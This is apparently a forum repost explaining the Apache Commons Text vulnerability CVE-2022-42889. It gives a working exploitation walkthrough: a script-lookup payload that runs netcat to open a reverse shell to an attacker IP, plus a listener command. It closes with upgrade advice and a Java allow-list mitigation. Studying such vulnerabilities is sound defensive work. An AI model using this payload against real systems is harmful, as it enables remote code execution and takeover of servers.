

What is the StringSubstitutor Interpolator vulnerability CVE-2022-42889?
This vulnerability affects the StringSubstitutor interpolator class included in the Apache Commons Text library. The default interpolator allows string lookups that include the "script", "dns" and "url" lookup keys by default. This deviates from what the documentation of the StringLookupFactory class describes and is due to a logic flaw in the default interpolator. Through these keys, an attacker who controls the interpolated string can execute arbitrary code via the lookups.
To exploit the vulnerability, the following requirements must be met:
Run a version of Apache Commons Text between 1.5 and 1.9.
Use the StringSubstitutor interpolator.
It is important to note that the StringSubstitutor interpolator is not as widely used as the string substitution feature in Log4j, the situation that led to Log4Shell.
How to Exploit CVE-2022-42889
To replicate the attack, a vulnerable component was deployed to a Docker container that could be reached from an EC2 instance controlled by the attacker. Using the Netcat (nc) command, we can establish a reverse shell connection with the vulnerable application.
The vulnerable web application exposes a search API that passes the query straight through the StringSubstitutor.
Code:
http://web.app/text4shell/attack?search=<query>
The following payload can be used to exploit the vulnerability and open a reverse shell:
Code:
${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.49.1 9090 -e /bin/sh')}
This payload consists of a "${prefix:name}" expression that triggers a string lookup. As mentioned above, "script", "dns" and "url" are among the keys that can be used as the prefix to exploit the vulnerability.
Before sending the prepared request, we need to listen on port 9090 using the netcat (nc) command to establish a reverse shell connection.
Code:
nc -nlvp 9090
Now we can send the prepared request. The payload is URL-encoded as shown below.
We can observe that the attacker has successfully established a connection with the vulnerable application.
Now, the attacker can gain root access to the vulnerable machine and execute arbitrary code.
Resolution for CVE-2022-42889:
If you are affected by CVE-2022-42889, you should update the Apache Commons Text dependency to version 1.10.
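As an added example (not from the original post), the following Java code builds a StringSubstitutor that resolves only an explicit allow-list of lookups instead of the library defaults, so the "script", "dns" and "url" prefixes from the payload above are never evaluated; this is the mitigation to apply where the 1.10 upgrade cannot be rolled out immediately. The class name SafeInterpolator and the sample input strings are constructed for illustration.

```java
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

// Constructed example class (not part of Commons Text or the original post).
public class SafeInterpolator {

    /** Builds a substitutor whose interpolator knows only the lookups listed here. */
    public static StringSubstitutor restricted() {
        Map<String, StringLookup> allowed = new HashMap<>();
        // "sys" and "env" are the only prefixes this application needs.
        allowed.put(StringLookupFactory.KEY_SYS,
                    StringLookupFactory.INSTANCE.systemPropertyStringLookup());
        allowed.put(StringLookupFactory.KEY_ENV,
                    StringLookupFactory.INSTANCE.environmentVariableStringLookup());
        // defaultStringLookup = null and addDefaultLookups = false: the library's
        // default set (which on 1.5 - 1.9 contains script, dns and url) is NOT added,
        // so an unknown prefix resolves to null and is left in place as literal text.
        StringLookup interpolator = StringLookupFactory.INSTANCE
                .interpolatorStringLookup(allowed, null, false);
        StringSubstitutor sub = new StringSubstitutor(interpolator);
        // Optional fail-closed behaviour: throw IllegalArgumentException on any
        // variable that cannot be resolved instead of passing it through.
        // sub.setEnableUndefinedVariableException(true);
        return sub;
    }

    public static void main(String[] args) {
        // Constructed sample inputs. The second has the shape of the attack string
        // discussed above; with the restricted interpolator it is not executed.
        String benign  = "java=${sys:java.version}";
        String hostile = "${script:javascript:1+1}";

        // StringSubstitutor.createInterpolator() would be the risky library default.
        StringSubstitutor hardened = restricted();

        System.out.println(hardened.replace(benign));   // "sys" prefix is resolved
        System.out.println(hardened.replace(hostile));  // printed unchanged, never evaluated
    }
}
```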
Source : https://www.turkhackteam.org/forumlar/web-server-security.743/post-thread
